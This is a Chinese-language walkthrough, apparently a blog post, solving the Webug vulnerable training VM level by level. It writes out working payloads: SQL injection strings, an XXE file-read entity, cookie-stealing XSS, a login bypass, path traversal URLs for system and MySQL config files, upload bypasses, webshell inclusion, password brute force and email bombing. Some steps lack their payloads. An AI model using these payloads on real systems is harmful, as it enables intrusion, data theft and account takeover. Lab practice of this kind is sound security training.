Webug官网:http://www.webug.org
一个不错的靶机,可以直接下载server2003虚拟机,即可直接打靶:
第一关:显错注入
用’会报错:
url:id=3' UNION SELECT 1,flag FROM flag where flag.id=1 %23
第二关:布尔注入
单引号:url?id=1' and length(user())>15 --+
第三关:延时注入
单引号:url?id=1' and sleep(1) --+, 页面有明显的延迟
第四关:Post注入
搜索引号’ 出现报错页面
搜索:' or sleep(3) # 延时打开成功!
第五关:过滤注入(同上)
第六关:宽字节注入
宽字节注入原理即是利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。
url?id=1%df',出现错误了
第七关:xxe注入
Payload为:data=
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///c:/passwd">]>
<root>
发现不行,将payload进行url编码:
第八关:csv注入
第九关:反射型xss
第十关:存储型xss
提交内容为:alert(document.cookie)<script>alert(document.cookie)</script>
第十一关:万能密码登录
尝试‘or 1=1 #,成功!
第十二关:DOM型XSS
在搜索框输入:" required="">alert(document.cookie)<script>alert(document.cookie)</script><name=",将value闭合。
第十三关:过滤XSS
第十四关:链接注入
第十五关:任意文件下载
http://10.254.254.129/control/filedownload/file_download.php?file=template/../../../boot.ini
第十六关:mysql配置文件下载
http://10.254.254.129/control/filedownload/ini_file_download.php?file=../mysql/my.ini
第十七关:文件上传(前端拦截)
将jpg后缀修改为php;
第十八关:文件上传(解析漏洞)
服务端调整成php-5.3.29-nts+Nginx
利用nginx的解析漏洞访问:
第十九关:文件上传(畸形文件)
将1.jpg修改成1.pphphp
第二十关:文件上传(截断上传)
将php切换到小于5.3.4的版本 并把magic_quotes_gpc改为off,00%还是失败:
把alert('error')改为$file_ext,尝试了%00截断,发现弹出的是.php而不是.jpg 因此截断失败;
第二十一关:文件上传(htaccess)
上传htaccess:
上传test文件:
访问:http://10.254.254.129/template/upload/test
第二十二关:越权修改密码
使用错误密码也能成功修改aaaaa账户密码,没有对账户的旧密码进行正误判断。令id=1,输入错误旧密码111111和新密码222222,可将admin用户密码成功修改为222222。
第二十三关:支付漏洞
第二十四关:邮箱轰炸
思路是用burpsuit抓取注册信息,然后在intruder模块中设置发送数量,和邮箱地址,即可形成邮箱轰炸。
第二十五关:越权查看admin
第二十六关:URL跳转
http://10.254.254.129/control/more/url_redirect.php?url=https://www.baidu.com
第二十七关:文件包含漏洞
执行我们上传的webshell:
http://10.254.254.129/control/more/file_include.php?filename=../../template/upload/shell.php
第二十八关:命令执行
切换版本至php-5.4.45 + Apache,再次访问:
然而没发现????请师傅指点!!
第二十九关:Webshell爆破
对口令进行爆破:
密码为a1,登录成功:
第四十关:Ssrf
探测内网机器80端口的服务
结语:
刚好刷完了整个靶机,跟各位师傅分享讨论一下,多多指点!
